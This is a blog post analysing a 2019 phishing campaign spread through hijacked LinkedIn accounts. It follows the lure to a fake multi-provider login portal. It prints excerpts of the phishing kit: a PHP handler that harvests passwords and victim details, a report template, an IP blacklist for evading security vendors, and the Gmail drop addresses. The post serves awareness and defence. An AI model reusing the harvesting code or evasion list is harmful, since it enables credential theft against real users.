The LinkedIn Real-time Messaging Phish of 2019

The LinkedIn Gangsters

A few days ago I received an invite from an old fintech colleague over the LinkedIn messaging service, the message read:

“Hi, I have attached a document for our new business financial proposal for your review. Access the proposal through the extension below and get back to me at your earliest convenience.

https://onedrive.live.com/?authkey=%21AFbNEI4K8RcVpmE&cid=EBDC72C570C985A5&id=EBDC72C570C985A5%21180&parId=root&o=OneUp

Coming from a 1st degree connection made this look like a legitimate communication. But, I haven’t been in touch with my friend for a while or have discussed any business with him recently, so this seemed a bit odd.

I texted him back via LinkedIn to verify that he indeed sent it. To my surprise, he responded in real-time with a confirmation. When I asked him if it was intended for me, he again confirmed it via the messenger application (Image 1).

LinkedIn RT Message Phish
Image 1: LinkedIn texting session

By all phishing standards, this one takes the cake. The attacker was actually conducting his exploit in real-time using my colleague’s compromised LinkedIn account. This was alarming because (1) the relatively high degree of trust that exists between you and your 1st degree network opens the door to a wide range of trust based attacks and (2) the real-time text messaging helped validate that the person that I was talking to was indeed the sender.

I switched to a sandboxed machine, clicked on the link, and went down the rabbit hole…

LinkedIn Link to OneDrive PDF
Image 2: Link from texting session to a OneDrive hosted PDF with a secondary login required to “View Message Folder”

The link to the business proposal routed to a PDF file that was hosted on a publically accessible Microsoft OneDrive folder (Image 2).

The PDF medatada indicated that it was created recently and dynamically using an Office365 MS Word. The file name was based on my colleague’s LinkedIn profile and the subject of the proposal was also related to his line of work. The author name of the PDF document had the wishful name “Incoming Wire”.

LinkedIn Phish PDF Metadata
Image 3
: The phishing PDF metadata

In order to “Continue reading your messages from OneDrive for Business”, I had to click on a second link titled “VIEW MESSAGE FOLDER”.  

The second link routed to the URL: ”https://normaav.ga/review”. This appeared to be a general access portal that aggregated different email systems and allowed the user to select their email provider of choice in order to view the “business proposal”.

LinkedIn Phish Login Portal
Image 4
: The logion portal loaded after clicking the PDF link

Clicking on the Office365 button option loaded a sign-in page and prompted me to enter my email address and the password for my Office365 account.

Normaav GA Office 365 Login
Image 5
: The fake Office365 logion page

Clicking on the other buttons resulted in the same functionality but with different email client login screens (Image 6).

LinkedIn Phish Logins
Image 6
: Other email client login pages

The amount of details built into the site was impressive. Where most phishing login pages deactivate superfluous links and features for efficiency reasons, this site was fully functional and even included the ability to reset your password–which came with a functional glyph generator and voice word reader.

Password Reset
Image 7
: Sample password reset screen

Next, I checked the .GA domain for some clues. It came back as a Gabon based account, however, the details of the registrar had the following Netherlands address:

Domain name:NORMAAV.GA
Gabon TLD B.V.
My GA administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax:     +31 20 5315721

After a little more digging, I found that the same owner also registered several other phishing domains that included sites like:

Domain name:TECHGURUHELP.GA
Gabon TLD B.V.
My GA administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax:     +31 20 5315721

So, from the look of it, this phishing site was just an elaborate email address and password collection utility. It wasn’t used for malware distribution or payload delivery.

The structure Narmaav.ga was made-up of several directories each comprised of PHP, html, images, Zip file, and some JavaScript files. The zip file housed all of the executable and site code and also provided an additional layer of obfuscation from the anti malware scanners that would be running on the hosting server.

Normaav GA File
Image 8: Sample content of one of the Narmaav.ga website “file” directory

LinkedIn Phish Directory Content
Image 9: The content of the “assets” directory showing the images and icons used to create the fake login screens

As far as the mechanics of the user data collection, clicking the “Next” button on the email login screen executed the following post function:

if (isset($_POST[‘username’]) && isset($_POST[‘password’])) {
    if ($_POST[‘username’] !== “” && $_POST[‘password’] !== “”) {

        $date = date(‘l d F Y’);
        $time = date(‘H:i’);
        $user = $_POST[‘username’];
        $pass = $_POST[‘password’];
        $source = $_POST[‘from’];
        $ip = $_SERVER[‘REMOTE_ADDR’];
        $systemInfo = systemInfo($_SERVER[‘REMOTE_ADDR’]);
        $VictimInfo1 = “| Submitted by : ” . $_SERVER[‘REMOTE_ADDR’] . ” (” . gethostbyaddr($_SERVER[‘REMOTE_ADDR’]) . “)”;
        $VictimInfo2 = “| Location : ” . $systemInfo[‘city’] . “, ” . $systemInfo[‘region’] . “, ” . $systemInfo[‘country’] . “”;
        $VictimInfo3 = “| UserAgent : ” . $systemInfo[‘useragent’] . “”;
        $VictimInfo4 = “| Browser : ” . $systemInfo[‘browser’] . “”;
        $VictimInfo5 = “| Os : ” . $systemInfo[‘os’] . “”;
        $data = “
+ ————- Scampage ————–+
+ Account Details
| Username : $user
| Password : $pass
| Source: $source
+ ——————————————+
+ Victim Information
$VictimInfo1
$VictimInfo2
$VictimInfo3
$VictimInfo4
$VictimInfo5

| Received : $date @ $time
+ ——————————————+

Its evident from the comments that the developer didn’t even bother anonymizing the variables, they just matter-of-factly named them: “Victim Information”, “Victim1”, “Scampage”, etc. Apparently, in the scammer industry, ripping off people is just another dehumanized banal job, not much different than stuffing hot dogs into a box on a production line.

Phish Victims
Image 10: Phishing victims as hot dogs

The data upload logic was also rudimentary without any fancy command and control features. Once all of the user information was collated, the content was simply posted to a “boxoffice794@gmail.com” email address. This Gmail account turned out to be just one of over 8134 emails used for data collection. The phishing site itself also came in a number of variations, with different version utilizing one or more of the listed email addresses (see a few samples below).

Password Collection Email Addresses

adamandeve10000@gmail.com

emailresult1000cc@gmail.com

boxresult81@gmail.com

johnbeng95@gmail.com

tingyangting111@gmail.com

sharoncute48@gmail.com

mrtrqbing@gmail.com

chingy555@gmail.com

cleverin15@gmail.com

edu.logs1@gmail.com

Table 1: A sampling of 10 emails out of the 8134 used by the phishing sites.

From a linguistic/semantic point of view, the creator of the site and the email accounts is most likely a native American English speaker who pays close attention to details. The verbiage on site has no spelling or major grammar issues. The composite names used in the email accounts demonstrate cleaver wordplay and use of contemporary idioms. The word generation algorithm also takes into account human readable combinations such as:

sql-injection
alibaba-reloaded
blood-money
call-me-ghost
extremely-blessed-007

Another interesting observation about the code is that it utilizes defensive strategies and countermeasures. For example, it uses a blacklist of IP addresses to stop the data uploader from running on high risk networks (like Fortinet, Kaspersky, Avg Technologies, etc.) where this activity would most likely be quickly detected and stopped. So in essence, this is a signature based form of reverse malware protection.

# _blacklist.dat  — contains address ranges to always be blocked.
#   Only IPv4 addressing is supported.
#
#   legal range formats are:
#
#   255.255.255.255                             Single address
#   255.255.255.255/16                       CIDR Mask
#   255.255.255.255/255.255.0.0       address w/mask
#   255.255.*.*                                        wildcards
#   255.255.255.0-255.255.255.255   low to high address
#
#   Comments may be added to a line starting with ‘#’ character
#   and inline comments may be added starting with ‘#’ character.
#


#  TOR SERVERS IP RANGES

96.47.226.16-96.47.226.23
74.120.15.144-74.120.15.159
96.44.189.96-96.44.189.103

 

#  AMAZON IP RANGES

54.219.0.0-54.219.255.255
54.193.0.0-54.193.255.255
204.236.128.0-204.236.255.255
54.242.0.0-54.243.255.255
107.20.0.0-107.23.255.255

Table 2: Extract from the blacklist used by the application in order to avoid high risk networks

It’s noteworthy that several of the PHP functions (see sample below) contain a reference to “MADEMEN CYBER TEAM”. The code also contains references to a specific developer who is using the alias “Sage The Hurt Ice”, this name is also associated with an active PayPal account called “payp algent” and “paya_ldirect”. 

Paypa_ldirect
Image 11: The author “SAGE THE HURT ICE”

 <TABLE>
    <tr><td>________MADEMEN CYBER TEAM_________</td></tr>
    <tr><td><STRONG>$domain I.D: $login<td/></tr>
    <tr><td><STRONG>Password: $passwd</td></tr>
    <tr><td><STRONG>IP: $ip</td></tr>
    <tr><td><STRONG>Date: $server</td></tr>
    <tr><td><STRONG>country : $country</td></tr>
    <tr><td>Browser : $browserAgent</td></tr>
    <tr><td>____HACKED BY SAGE THE HURT ICE (SKYPE =PAYP ALGENT)____</td></tr>
    </BODY>

What makes this exploit so potent is that the operation is combining machine generated content, large degree of automation, and the creation of near real-time customized payloads that are based on LinkedIn account user data. Just like with a traditional mail merge operation where the customization of each letter is done by pulling content from different databases, the same takes place here, with a slight variation that the database is the user’s LinkedIn profile and the ‘mail to’ is his entire LinkedIn network.

With all of these dynamic orchestration capabilities, the cheery on the cake is that there was also a human in the loop that chatted with the target in real-time in order to confirm the authenticity of the phish.

This exploit should be a major concern for LinkedIn and its users. in 2016, LinkedIn lost 117 million user accounts (they were hacked as early as 2012 but didn’t discover it until 2016). Many of these passwords have not been changed by the users who are still unaware of the breach. This means that the perpetrators of the current phishing expedition are essentially shooting fish in a barrel.

Based on the Narmaav.ga site uptime of 4 days (before it was flagged as ‘deceptive” by the search engines), the volume of recovered passwords, and the number of concurrent phishing campaigns (about 10K), a conservative estimate for this campaign’s yield is over 100K new breached accounts.

So what can you do to avoid getting your LinkedIn account hacked? Obviously, don’t click on any links sent to you via the messenger. You should stop reusing the same password for multiple accounts and make it more complex. You should also consider using a password management system. In the long run though, your best bet is to enable two factor authentication (using your phone) for all of your accounts. Most ecommerce sites like Amazon, PayPal, and email providers already offer this as a free service and activating it is just a simple two step process.

Notes
Soon after detecting the exploit, I notified LinkedIn about the details of the breach. It took LinkedIn more than 48 hours to reply. The response I got was “We have provided this information to the correct team to review further and act based on their results.”  I haven’t heard back from them since. I have also followed up with several of the victims, who were completely unaware that someone took over their LinkedIn account and was using it to mount a phishing expedition.

If you haven’t done this for a while, It may also behoove you to login to your LinkedIn and other social media accounts just to make sure that it’s still accessible.

References and Sourcing

–  XRVision Sentinel AI Platform: Face recognition, image reconstruction, and object detection
2019 State of the Phish Report (page 11-19 cover estimated recovery rates): Proofpoint.com
The complete phishing kit  (source code and files)
The phishing email addresses directory (where the stolen credentials are sent after harvesting)
LinkedIn Breach Exposed 117 Million User Accounts: eSecurity Planet
Facebook stored 200-600 millions of Instagram passwords in plain text: IT ProPortal
Password Safe: A free and open source password management system

© Copyright 2019 Yaacov Apelbaum, All Rights Reserved.